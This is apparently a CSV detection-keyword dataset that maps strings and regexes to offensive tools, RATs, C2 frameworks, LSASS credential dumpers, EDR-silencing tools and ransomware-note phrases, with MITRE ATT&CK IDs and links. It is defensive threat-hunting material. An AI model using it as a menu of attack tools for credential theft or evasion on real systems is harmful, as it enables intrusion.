"*xzfbmR6MskR8J6Zr58RrhMc325kejLJE*",".{0,1000}xzfbmR6MskR8J6Zr58RrhMc325kejLJE.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","63329"
"*Y21kLmV4ZSAvYyBwaW5nIDAgLW4gMiAmIGRlbCA=*",".{0,1000}Y21kLmV4ZSAvYyBwaW5nIDAgLW4gMiAmIGRlbCA\=.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#base64","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","63330"
"*Y29iYWx0c3RyaWtl*",".{0,1000}Y29iYWx0c3RyaWtl.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","63331"
"*Y2F0Y2hldHVtYm90aWZ5b3VjYW4-*",".{0,1000}Y2F0Y2hldHVtYm90aWZ5b3VjYW4\-.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","#base64","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","63332"
"*yanncam/ShuckNT*",".{0,1000}yanncam\/ShuckNT.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","N/A","10","1","69","9","2024-10-18T10:45:49Z","2023-01-27T07:52:47Z","63337"
"*YaraFilters*lsassdump.yar*",".{0,1000}YaraFilters.{0,1000}lsassdump\.yar.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","63338"
"*yarrick/iodine*",".{0,1000}yarrick\/iodine.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","1","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","63341"
"*yasserbdj96/hiphp*",".{0,1000}yasserbdj96\/hiphp.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","63342"
"*yasserjanah/CVE-2020-5902*",".{0,1000}yasserjanah\/CVE\-2020\-5902.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/yasserjanah/CVE-2020-5902","1","1","N/A","N/A","N/A","1","43","15","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z","63343"
"*YaWNdpwplLwycqWQDCyruhAFsYjWjnBA*",".{0,1000}YaWNdpwplLwycqWQDCyruhAFsYjWjnBA.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","LockBit","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","N/A","10","10","779","223","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z","63344"
"*Yaxser/Backstab*",".{0,1000}Yaxser\/Backstab.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","63345"
"*Yay! No SYSMON here!*",".{0,1000}Yay!\sNo\sSYSMON\shere!.{0,1000}","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","0","#content","N/A","N/A","1","88","16","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z","63346"
"*yck1509/ConfuserEx*",".{0,1000}yck1509\/ConfuserEx.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","1","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","63347"
"*YDHCUI/csload.net*",".{0,1000}YDHCUI\/csload\.net.{0,1000}","offensive_tool_keyword","cobaltstrike","A cobaltstrike shellcode loader - past domestic mainstream antivirus software","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/YDHCUI/csload.net","1","1","N/A","N/A","10","10","122","15","2021-05-21T02:36:03Z","2021-05-20T08:24:16Z","63348"
"*YDHCUI/manjusaka*",".{0,1000}YDHCUI\/manjusaka.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","N/A","10","10","818","150","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z","63349"
"*yeelight_discover.py*",".{0,1000}yeelight_discover\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","N/A","8","10","2098","1599","2024-10-22T13:31:06Z","2021-01-07T16:11:52Z","63350"
"*yehia-mamdouh/Lsassx*",".{0,1000}yehia\-mamdouh\/Lsassx.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","1","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","63351"
"*yehia-mamdouh/Shell3er*",".{0,1000}yehia\-mamdouh\/Shell3er.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","1","N/A","N/A","9","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","63352"
"*yehia-mamdouh/var0xshell*",".{0,1000}yehia\-mamdouh\/var0xshell.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","1","N/A","N/A","8","10","4","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z","63353"
"*yeuajcizwytgmrntijhxphs6wn5txp2prs6rpndafbsapek3zd4ubcid.onion*",".{0,1000}yeuajcizwytgmrntijhxphs6wn5txp2prs6rpndafbsapek3zd4ubcid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63354"
"*Yh0Js82rIfFEbS6pR7oUkN0Use54pIZBa3fpYprAMuURNrZZGc6cM8dc+AC*",".{0,1000}Yh0Js82rIfFEbS6pR7oUkN0Use54pIZBa3fpYprAMuURNrZZGc6cM8dc\+AC.{0,1000}","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","N/A","9","10","1389","257","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z","63355"
"*yisier/nps*",".{0,1000}yisier\/nps.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","1","N/A","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","63356"
"*Yml0c3kubWl0LmVkdQ==*",".{0,1000}Yml0c3kubWl0LmVkdQ\=\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","#base64","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","63360"
"*YmpwZW5uaXNhbmF3ZXNvbWVmaWdodGVy*",".{0,1000}YmpwZW5uaXNhbmF3ZXNvbWVmaWdodGVy.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","#base64","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","63361"
"*YmxvY2s9MTAw*",".{0,1000}YmxvY2s9MTAw.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","63362"
"*yogeshojha/rengine*",".{0,1000}yogeshojha\/rengine.{0,1000}","offensive_tool_keyword","rengine","reNgine is an automated reconnaissance framework for web applications with a focus on highly configurable streamlined recon process via Engines recon data correlation and organization continuous monitoring backed by a database and simple yet intuitive User Interface. reNgine makes it easy for penetration testers to gather reconnaissance with","T1595.003 - T1590.002 - T1083 - T1071","TA0007 - TA0005 - TA0043","N/A","N/A","Reconnaissance","https://github.com/yogeshojha/rengine","1","1","N/A","N/A","N/A","10","7866","1195","2025-02-24T01:03:27Z","2020-05-03T12:13:12Z","63363"
"*yolAbejyiejuvnup=Evjtgvsh5okmkAvj*",".{0,1000}yolAbejyiejuvnup\=Evjtgvsh5okmkAvj.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: Elastic Security - link: https://raw.githubusercontent.com/elastic/protections-artifacts/main/yara/rules/Linux_Trojan_XZBackdoor.yar","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#linux","rule author: Elastic Security - link: https://raw.githubusercontent.com/elastic/protections-artifacts/main/yara/rules/Linux_Trojan_XZBackdoor.yar","10","10","N/A","N/A","N/A","N/A","63364"
"*YOLOP0wn/POSTDump*",".{0,1000}YOLOP0wn\/POSTDump.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","63365"
"*You are trying to target a User Group Policy Object while running the embedded SMB server*",".{0,1000}You\sare\strying\sto\starget\sa\sUser\sGroup\sPolicy\sObject\swhile\srunning\sthe\sembedded\sSMB\sserver.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","63366"
"*You can execute commands in this shell :D*",".{0,1000}You\scan\sexecute\scommands\sin\sthis\sshell\s\:D.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","63367"
"*you cannot run the RogueOxidResolver on 127.0.0.1*",".{0,1000}you\scannot\srun\sthe\sRogueOxidResolver\son\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","63368"
"*You can't CD under SMBEXEC. Use full paths*",".{0,1000}You\scan\'t\sCD\sunder\sSMBEXEC\.\sUse\sfull\spaths.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","#content","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","63369"
"*You do not have sufficient permission to hide the scheduled task*",".{0,1000}You\sdo\snot\shave\ssufficient\spermission\sto\shide\sthe\sscheduled\stask.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","63370"
"*You finally broke through BlankOBF v2; Give yourself a pat on your back!*",".{0,1000}You\sfinally\sbroke\sthrough\sBlankOBF\sv2\;\sGive\syourself\sa\spat\son\syour\sback!.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","63371"
"*You have been hack By Shany with Love To #worst*",".{0,1000}You\shave\sbeen\shack\sBy\sShany\swith\sLove\sTo\s\#worst.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","63372"
"*YOU HAVE to CONTACT US using TOR LIVE CHAT*",".{0,1000}YOU\sHAVE\sto\sCONTACT\sUS\susing\sTOR\sLIVE\sCHAT.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63373"
"*You managed to break through BlankOBF v2; Give yourself a pat on your back!*",".{0,1000}You\smanaged\sto\sbreak\sthrough\sBlankOBF\sv2\;\sGive\syourself\sa\spat\son\syour\sback!.{0,1000}","offensive_tool_keyword","BlankOBF","BlankOBF is a Python obfuscation tool designed to make Python programs harder to understand","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/Blank-c/BlankOBF","1","0","N/A","N/A","9","2","114","22","2024-12-23T02:53:41Z","2022-01-24T13:52:00Z","63374"
"*You need to be in high integrity to extract LSA secrets!*",".{0,1000}You\sneed\sto\sbe\sin\shigh\sintegrity\sto\sextract\sLSA\ssecrets!.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","63376"
"*You need to contact us on TOR darknet sites with your personal ID*",".{0,1000}You\sneed\sto\scontact\sus\son\sTOR\sdarknet\ssites\swith\syour\spersonal\sID.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63377"
"*you need to provide the path to directory where your phishlets are stored:*",".{0,1000}you\sneed\sto\sprovide\sthe\spath\sto\sdirectory\swhere\syour\sphishlets\sare\sstored\:.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","#content","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","63378"
"*You_spin_me__round.ino*",".{0,1000}You_spin_me__round\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","63379"
"*youcantpatchthis*",".{0,1000}youcantpatchthis.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","0","N/A","N/A","10","10","116","23","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z","63380"
"*youhacker55/PayGen*",".{0,1000}youhacker55\/PayGen.{0,1000}","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1059.001 - T1209 - T1105 - T1547 - T1027","TA0003 - TA0005 - TA0002 - TA0011","N/A","N/A","Persistence","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","N/A","1","4","0","2023-02-23T00:05:57Z","2021-06-16T20:20:55Z","63381"
"*you'll need the system key of the DC that you pulled the NTDS.dit file*",".{0,1000}you\'ll\sneed\sthe\ssystem\skey\sof\sthe\sDC\sthat\syou\spulled\sthe\sNTDS\.dit\sfile.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#content","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","63382"
"*Your data is stolen and encrypted*",".{0,1000}Your\sdata\sis\sstolen\sand\sencrypted.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63383"
"*Your files have been encrypted using Prince Ransomware!*",".{0,1000}Your\sfiles\shave\sbeen\sencrypted\susing\sPrince\sRansomware!.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 - T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","0","#content","N/A","10","","N/A","","","","63384"
